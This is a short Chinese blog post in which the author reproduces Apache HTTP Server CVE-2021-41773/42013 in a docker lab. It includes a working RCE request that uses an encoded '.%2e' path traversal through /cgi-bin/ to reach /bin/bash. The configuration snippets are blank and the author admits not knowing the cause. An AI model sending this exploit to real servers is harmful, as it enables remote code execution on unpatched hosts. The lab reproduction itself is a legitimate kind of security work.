复现了一下apache的RCE漏洞,原理还没细看
(CVE-2021-42013&CVE-2021-41773)
一、漏洞简介
Apache HTTP Server是阿帕奇(Apache)基金会的一款开源网页服务器。
二、漏洞影响
影响版本:
1 | Apache HTTP Server 2.4.50 |
三、复现过程
好像要conf文件中修改一下配置:
1 | <Directory> |
改成
1 | <Directory> |
不过我是直接使用的docker环境:
1 | docker pull vulfocus/apache-cve_2021_41773:latest |
部署好docker之后,看server版本:
确认为漏洞版本。
RCE POC:
1 | POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1 |
成功执行:
漏洞原因好像是cgi脚本的处理问题,没细看,还有个路径穿越的poc,忘了记录了,现在复现不出来了,就很离谱
- 本文作者: Sn1pEr
- 本文链接: https://sn1per-ssd.github.io/2021/10/13/apache-RCE漏洞复现/
- 版权声明: 本博客所有文章除特别声明外,均采用 MIT 许可协议。转载请注明出处!